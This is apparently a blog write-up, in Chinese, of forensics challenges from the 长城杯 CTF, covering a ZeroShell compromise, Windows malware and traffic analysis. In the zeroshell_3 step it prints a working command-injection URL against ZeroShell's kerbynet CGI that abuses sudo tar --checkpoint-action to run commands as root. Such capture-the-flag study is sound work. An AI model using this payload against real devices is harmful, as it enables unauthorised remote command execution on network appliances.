长城杯

长城杯

zeroshell_1

flag的base64是ZmxhZw==查找字符串Zmxh

img

http.referer == "ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9"

解码得到flag

zeroshell_2

上网搜到zeroshell POC,以及明文的管理员账号密码(流量包里也有)

image-20241216160643456

直接查看flag文件就行(或者虚拟机里 cat /flag)img

zeroshell_3

查看主机的外联服务器的所有TCP,UDP,IP和进程使用

payload打

http://61.139.2.100//cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec='netstat%20-ano%20'%0A'

或者虚拟机找

netstat -ano

img

zeroshell_4

木马常见于/tmp目录下,尝试提交隐藏文件 最终发现是.nginx文件img

zeroshell_5

wget下载文件 用ida分析得到密钥img

img

WinFT_1

打开火绒剑->网络 看到爆红文件 拖到微步云沙箱检测

img将fluv文件后面的ip填上 得到完整的flag

img

WinFT_2

找到任务计划书 得到base64 解码

img

img

WinFT_5

流量包里找到flag.txt提取压缩包,解码压缩包末尾的base64得到压缩包密码

image-20241216172337773

解压缩得到flag

image-20241216172423193

sc05_1

根据提示 查找对应ip的请求时间 img

转换格式到大写md5 就是flag

img

posted @ 2024-12-16 17:29  Yolololololo  阅读(21)  评论(0编辑  收藏  举报